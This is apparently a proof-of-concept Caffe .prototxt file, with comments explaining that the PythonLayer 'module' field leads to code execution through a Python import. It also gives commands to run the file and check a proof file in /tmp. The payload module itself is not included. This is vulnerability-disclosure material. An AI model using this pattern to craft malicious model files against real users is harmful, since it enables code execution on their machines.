| # PoC: Caffe PythonLayer Arbitrary Code Execution | |
| # ================================================ | |
| # Loading this .prototxt with a Caffe build that has WITH_PYTHON_LAYER=1 | |
| # triggers arbitrary Python code execution via module import. | |
| # | |
| # Vulnerability: layer_factory.cpp:295 | |
| # bp::import(param.python_param().module().c_str()) | |
| # | |
| # The "module" field specifies a Python module name that gets imported | |
| # via boost::python. The import mechanism executes all top-level code | |
| # in the module, giving the attacker arbitrary code execution. | |
| # | |
| # Usage: | |
| # cd /path/to/this/directory # so Python finds evil_layer.py | |
| # caffe test -model poc_rce.prototxt -iterations 1 2>/dev/null | |
| # cat /tmp/caffe_rce_proof.txt # verify RCE | |
| # | |
| # Or from Python: | |
| # import caffe | |
| # net = caffe.Net('poc_rce.prototxt', caffe.TEST) | |
| name: "PoCExploitNet" | |
| layer { | |
| name: "data" | |
| type: "DummyData" | |
| top: "data" | |
| dummy_data_param { | |
| shape { dim: 1 dim: 1 dim: 1 dim: 1 } | |
| } | |
| } | |
| layer { | |
| name: "exploit" | |
| type: "Python" | |
| bottom: "data" | |
| top: "output" | |
| python_param { | |
| # This module name is passed directly to bp::import() | |
| # Python's import mechanism executes top-level code in the module | |
| module: "evil_layer" | |
| layer: "ExploitLayer" | |
| } | |
| } | |